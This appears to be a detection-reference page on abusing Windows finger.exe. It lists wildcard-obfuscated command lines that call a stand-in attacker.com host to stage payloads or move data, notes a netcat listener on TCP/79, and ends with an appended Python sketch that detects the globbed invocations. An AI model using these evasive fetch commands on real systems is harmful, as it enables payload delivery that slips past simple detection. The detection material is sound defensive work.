finger
Legacy user info protocol client. Can retrieve arbitrary text from an attacker-controlled finger server, enabling data exfiltration and payload staging.
Binary Paths
C:\Windows\System32\finger.exe
Glob Patterns
| Pattern | Notes |
|---|---|
| `for /f %i in ('where fin*.exe') do %i user@attacker.com` | Star matches 'ger' after 'fin' |
| `for /f %i in ('where f?nger.exe') do %i user@attacker.com` | Single char wildcard replaces 'i' |
| `for /f %i in ('where f*r.exe') do %i user@attacker.com` | Star matches 'inge' between 'f' and 'r' |
| `for /f %i in ('dir /b C:\Windows\System32\fin*.exe') do %i user@attacker.com` | dir /b glob finds finger.exe in System32 |
| `forfiles /p C:\Windows\System32 /m fin*.exe /c "@file user@attacker.com"` | forfiles * mask finds finger.exe — @file expands to matched filename |
| `C:\Windows\System32\finger.exe user@attacker.com` | Direct invocation — response from attacker's finger server is printed to stdout |
| `for %i in (C:\Windows\System32\fin*.exe) do @%i user@attacker.com` | Native CMD for loop with filesystem glob — expands fin*.exe directly in System32 without where.exe |
| `for /f %i in ('where /r C:\Windows\System32 fin*.exe') do %i user@attacker.com` | Recursive where search — fin* matches finger.exe; scoped to System32 to avoid matching other tools |
YARA Rule
Auto-generated detection rule for finger
Platform Notes
finger.exe is enabled on older/misconfigured Windows systems. It queries the RFC 1288 finger protocol (TCP/79). An attacker can run a netcat listener (nc -l -p 79) to serve arbitrary data. The response is printed to stdout and can be captured with for /f. In batch scripts use %%i instead of %i.
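Detection note, as an added example that is not part of the original page or its auto-generated rule: a string match on `finger.exe` misses every wildcard row in the Glob Patterns table, so this sketch expands each wildcard token of a logged command line and checks whether it resolves to `finger.exe`. The function names, the `min_literals` threshold and the sample lines are assumptions made here; the matcher is a simplified `*`/`?` translation and does not model 8.3 short names.

```python
import re

TARGET = "finger.exe"
# Delimiters that cmd.exe-style command lines put around file arguments.
_SPLIT = re.compile(r"[\s'\"()]+")

def glob_to_regex(glob):
    """Translate a cmd-style glob: '*' = any run, '?' = one char, rest literal."""
    parts = [".*" if c == "*" else "." if c == "?" else re.escape(c) for c in glob]
    return re.compile("".join(parts), re.IGNORECASE)

def token_hits_finger(token, min_literals=2):
    """True if a token names finger.exe literally or through a wildcard."""
    base = token.lstrip("@").replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if not base:
        return False
    if "*" not in base and "?" not in base:
        return base in (TARGET, "finger")
    stem = base[:-4] if base.endswith(".exe") else base
    # Assumed threshold: skip broad masks such as *.exe that match everything.
    if sum(c not in "*?" for c in stem) < min_literals:
        return False
    return glob_to_regex(base).fullmatch(TARGET) is not None

def find_finger_reference(cmdline):
    """Return the first token resolving to finger.exe, or None."""
    for token in _SPLIT.split(cmdline):
        if token_hits_finger(token):
            return token
    return None

# Constructed sample command lines (host.example is a placeholder destination).
SAMPLES = [
    r"for /f %i in ('where f?nger.exe') do %i user@host.example",
    r'forfiles /p C:\Windows\System32 /m fin*.exe /c "@file user@host.example"',
    r"for %i in (C:\Windows\System32\f*r.exe) do @%i user@host.example",
    r"dir /b C:\Windows\System32\*.exe",
    r"where find*.exe",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(find_finger_reference(line), "<-", line)
```

Pairing a hit with process-creation telemetry for the child process, or with outbound TCP/79 connections, confirms whether the glob actually launched finger.exe.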